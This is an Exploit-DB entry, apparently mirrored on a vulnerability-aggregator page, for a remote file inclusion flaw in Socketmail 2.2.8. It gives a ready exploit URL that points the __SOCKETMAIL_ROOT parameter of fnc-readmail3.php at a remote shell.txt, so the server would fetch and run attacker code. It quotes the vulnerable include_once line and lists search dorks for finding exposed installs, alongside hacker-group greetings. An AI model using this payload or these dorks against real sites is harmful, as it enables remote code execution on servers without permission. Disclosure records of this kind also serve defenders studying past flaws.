Lucene search

K
exploitdbBiNgZaEDB-ID:4554
HistoryOct 22, 2007 - 12:00 a.m.

Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion

2007-10-2200:00:00
BiNgZa
www.exploit-db.com
29

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:

----------------------------------------------
} else {
    include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm, str0ke

BiG sHoUt OuT tO udplink.net

FoUnD By BiNgZa

DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"

DORK2: "Powered by SocketMail"

[email protected]

shadow.php0h.com

# milw0rm.com [2007-10-22]

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%